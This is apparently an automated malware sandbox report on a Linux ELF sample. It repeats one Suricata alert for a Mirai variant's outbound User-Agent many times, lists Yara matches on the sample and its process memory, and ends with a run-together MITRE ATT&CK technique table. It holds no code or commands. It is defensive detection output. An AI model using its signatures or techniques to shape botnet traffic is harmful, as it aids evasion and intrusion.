          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: TrafficSuricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
          Source: Yara matchFile source: x86_64.elf, type: SAMPLE
          Source: Yara matchFile source: 6216.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: 6218.1.0000000000400000.0000000000411000.r-x.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: x86_64.elf PID: 6216, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: x86_64.elf PID: 6218, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media11
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
          Application Layer Protocol
